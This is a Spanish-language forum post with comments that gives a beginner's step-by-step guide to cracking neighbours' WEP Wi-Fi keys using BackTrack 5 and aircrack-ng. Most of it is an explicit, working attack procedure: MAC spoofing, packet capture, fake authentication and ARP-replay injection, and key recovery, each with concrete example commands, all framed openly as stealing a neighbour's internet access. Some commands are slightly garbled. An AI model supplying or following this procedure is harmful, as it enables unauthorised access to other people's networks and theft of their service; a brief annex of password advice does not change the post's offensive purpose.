El post que buscas se encuentra eliminado, pero este también te puede interesar

Crackear redes WEP (sin saber nada)

Hace un par de meses me mude y se presento un dilema: sin plata para pagar Internet, como conectarse? Gracias a las maravillas arquitectónicas de Capital Federal (Lease vivir todos apretados), pude notar que habia muchas conexiones alrededor. Buscando, averigue que las redes WEP son particularmente vulnerables.

Voy a explicar para que cualquier hijo de vecino, cosas que son bastante complicadas si se las pretende entender en profundidad. Así que si sos como yo un NO administrador de redes, te recomiendo que simplemente sigas los pasos.

A tener en cuenta:

1. Tenes que estar cerca de la red. Mientras mas cerca, mejor. Si captas solo una linea, o digamos menos del 50% de fuerza de la red, va a ser una tarea venenosa.
2. Tienen que ser redes con seguridad WEP. Si bien las redes WPA y WPA2 son crackeables, es un dolor de huevo y no creo que valga la pena.
3. Necesitan una placa de red inalambrica, obviamente.

Primer paso: Backtrack 5
Lo primero que tienen que hacer es conseguir backtrack 5. Los buscan con Google o algún buscador de Torrents, no van a tener problemas para encontrarlo. Backtrack es simplemente una distribución de Linux que tiene todo lo necesario para nuestro trabajito.
Una vez que descargan esto (es un archivo iso), lo queman en un DVD. Reinician la maquina y bootean desde el DVD.
Aca van a llegar a una especie de menu, donde hay varias opciones.
Crackear redes WEP (sin saber nada)

Eligen la primera, pasan un montón de letras tipo DOS hasta que llega a un alto. En este momento escriben "startx" y le dan Enter.
Luego de un par de letras mas, inicia el sistema que se ve igual que un linux.


Hackear



Empezando con el trabajo:
Una vez que inicio y esta todo lindo, abrimos una consola. (para los que ni siquiera saben que es esto, busquen en google "consola linux".
Dentro de esta consola escribimos nuestro primer comando:
airmon-ng
Este comando nos va a mostrar nuestros dispositivos de red inalambricos. Generalmente se llaman "wlan0" o "wlan1", algo asi.
Nos fijamos como se llama nuestro dispositivo y a continuacion escribimos:
airmon-ng stop (nombre de dispositivo)

ifconfig (nombre de dispositivo) down

macchanger --m 00:11:22:33:44:55 (nombre de dispositivo)

airmon-ng start (nombre de dispositivo)

EJEMPLO:
Si tu tarjeta de red se llama wlan0, entonces los comandos serían:

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger – -mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0


contraseña

Una vez que hicieron esto con exito, pasamos al siguiente paso; escribimos:

airodump-ng (tarjeta de red)

Una vez que apretan enter a este codigo, van a empezar a aparecer las redes que tu tarjeta ve. La lista es interminable porque continuamente actualiza, asi que para frenarlo apreta "CTRL + C"

redes

Aca vemos que aspecto tiene esta lista.
Obviamente, ustedes sabran que red agarran con mas fuerza, asi que elijan esa, siempre y cuando tenga seguridad WEP.

A continuacion escribimos:

airodump-ng -c (canal) -w (nombre del archivo) --bssid (bssid) (nombre del dispositivo)

(canal) = Canal que use la red que elegimos.
(nombre de archivo) = nombre del archivo en donde guardamos info. Ponganle algo que se acuerden porque lo van a usar mas adelante.
(bssid) = BSSID de la red que eligieron.

Esta linea la completamos con la red que ustedes eligieron. Entonces quedaría (siguiendo el ejemplo de la foto):
airodump-ng -c 3 -w yoyo – -bssid 00:23:69:BB:2D:0F wlan0

Le damos enter y ahora ya estas capturando datos. Fíjate que hay una columna que dice DATA, estos son los paquetes que llevas capturados, para poder descifrar la clave WEP como mínimo deves capturar unos 20,000 paquetes.

Inyectando trafico a la red:
Para acelerar un poco las cosas y que la columna de DATA se llene rapido, vamos a inyectar paquetes a la red.
Abrimos otra consola y escribimos:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (nombre del dispositivo)

(bssid) = BSSID de la red que elegimos.
-h = Nuestra mac. Acuerdense que al principio la cambiamos a 00:11:22:33:44:55
(nombre del dispositivo) = nuestra tarjeta de red (wlan0, wlan1 o lo que sea)

Siguiendo el ejemplo de la foto, este comando quedaria asi:
aireplay-ng -1 0 -a 00:23:69:BB:2D:0F -h 00:11:22:33:44:55 wlan0

Después de introducir el comando deberían aparecer 4 lineas de codigos y la final debe decir que la conexion ha sido exitosa (“Association successful”).
Si por alguna razón no te puedse conectar, entonces las causas pueden ser las siguientes:

-La red que quieres atacar esta muy lejos.
-Tu tarjeta de red no puede hacer inyeccion de paquetes.
-El router que quieres atacar tiene seguridad para evitar este tipo de ataques.

Wifi


Entonces, una ves que tuvimos el "association successful", insertamos un nuevo comando:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (tarjeta de red)

Siguiendo el ejemplo de las fotos nos quedaria asi:

aireplay-ng -3 -b 00:23:69:BB:2D:0F -h 00:11:22:33:44:55 wlan0

Dependiendo de la potencia de la red que estés atacando este proceso podría tomar algún tiempo. Deja la PC haciendo eso y volve cuando tengas 20.000 paquetes en la columna DATA

Terminando:
Una ves que llegues a los 20.000 paquetes en la columna DATA, abri una nueva consola y escribi:
aircrack-ng-b (bssid) (nombre de archivo-01.cap)

Automaticamente te agrega al final del nombre de archivo que elegimos anteriormente -01, -02 o lo que fuere.

Siguiendo el ejemplo de las foto nos queda asi:
aircrack-ng-b 00:23:69:BB:2D:0F yoyo-01.cap)


Si los datos fueron suficientes, trabaja un par de segundos y te tira la clave.
Si los datos no fueron suficientes, te avisa que va a volver intentar cuando tenga mas paquetes. No toques nada y volve al rato.

IMPORTANTE: A veces te tira la clave en hexadecimal. Anotala venga como venga, que windows te acepta que la escribas en hexadecimal.




Espero que hayan entendido, es facil por mas que parece complicado. Tomense el tiempo para entender bien que es lo que tienen que reemplazar en cada comando, no copien simplemente lo que puse porque tienen que adaptarlo obviamente a su entorno.
Este es el metodo mas basico; hay redes que se van a poner putas y no va a funcionar. Si investigan en internet, van a encontrar las respuestas para cagar a cualquier red.
Y hagan lo que hagan, no vayan a pedir ayuda a ningun foro especializado, porque esa gente estudia la seguridad con fines educativos, no para cagarle el Wi Fi a los vecinos. Asi que te van a putear y/o ignorar.


Saludos.!


ANEXO:
Por cierto, si tenes internet y lo pagas, obvio que no vas a querer que te lo usen:
1- Usa encriptacion WPA o WPA2
2- No pongas contraseñas fantasiosa (por ejemplo 15 digitos numericos) porque son fáciles. Pone combinaciones del tipo "carlitos1482casa".
Para crackear redes WPA/WPA2 se usan diccionarios de palabras, y ningun diccionario tiene tales combinaciones.





Fuentes de Información - Crackear redes WEP (sin saber nada)

El contenido del post es de mi autoría, y/o, es un recopilación de distintas fuentes.

Dar puntos
139 Puntos
Votos: 21 - T!score: 7/10
  • 6 Seguidores
  • 15.871 Visitas
  • 67 Favoritos

Comentarios Destacados

@looterd Hace más de 2 años +18
cremademani dijo:haz esto y veras como tu computador agoniza con los peores virus existentes

¿No se si sos pelotudo o solo un ignorante?
@FrancoMonjes Hace más de 1 año +2
Diria quico: "Las dos cosas"
@franlaco Hace más de 6 meses
maal! jaja
@DanRocker Hace más de 2 años +10
looterd dijo:
cremademani dijo:haz esto y veras como tu computador agoniza con los peores virus existentes
¿No se si sos pelotudo o solo un ignorante?

crackear

23 comentarios - Crackear redes WEP (sin saber nada)

@aguantelrap Hace más de 2 años
Van a hacer un post de "como detectar si te estan usando la red y bloquearlos" sala algo para crackear y siempre sale algo para defenderse, es como la guerra. INFINITO!
@ScarlettJohansso Hace más de 2 años
Muy bueno el Backtrack 5, a mi me funciono y crackee 3 redes distintas
salvo un par que le inyecto trafico de red, y siguen lento los data
@allan87 Hace más de 2 años
Buen post!@ Como cuanto dura en descargar los 20.000 paquetes con una conexion de 70Kb/s (esa es mi descarga)

Si me respondes te doy +10
@Krieg- Hace más de 2 años
Buen post, pero es más fácil con wepCrackGui en ubuntu, es aircrack en modo gráfico, en el fondo es lo mismo, pero más fácil de usar

Buen post.
@cremademani Hace más de 2 años -18
haz esto y veras como tu computador agoniza con los peores virus existentes
@allan87 Hace más de 2 años
cremademani dijo:haz esto y veras como tu computador agoniza con los peores virus existentes

Jajjaja, Exiten Firewalls, Antivirus y Seguridad Maxima. Asi que te pueden hackear solo con tener el mando de tuPC
@looterd Hace más de 2 años +18
cremademani dijo:haz esto y veras como tu computador agoniza con los peores virus existentes

¿No se si sos pelotudo o solo un ignorante?
@FrancoMonjes Hace más de 1 año +2
Diria quico: "Las dos cosas"
@franlaco Hace más de 6 meses
maal! jaja
@DanRocker Hace más de 2 años +10
looterd dijo:
cremademani dijo:haz esto y veras como tu computador agoniza con los peores virus existentes
¿No se si sos pelotudo o solo un ignorante?

crackear
@elnegro2011 Hace más de 2 años +2
looterd dijo:
cremademani dijo:haz esto y veras como tu computador agoniza con los peores virus existentes

¿No se si sos pelotudo o solo un ignorante?

ami no me caga es las 2 cosas
@allan87 Hace más de 2 años
+10
@megacompos Hace más de 2 años +4
oye? se puede desde una usb? en una notebook?
@olivo_ink Hace más de 2 años -2
y mi pregunta es quien en esta epoca encripta en wep si ya la mayoria salen en wap y psk2 y filtrado
@julio_2112 Hace más de 2 años
Pregunta tonta, pero pregunta al fin: Es para linux ..??
@julio_2112 Hace más de 2 años
NegroBarro dijo:
julio_2112 dijo:Pregunta tonta, pero pregunta al fin: Es para linux ..??


Usas backtrack que es una distribucion de linux con los programas que necesitas. Asi que simplemente usas el live cd.

Muchas gracias...
@harat-228 Hace más de 2 años
donde encuentro el backtrack?
@matiasuiy Hace más de 7 meses
el beining es mas facil de usar y da resultado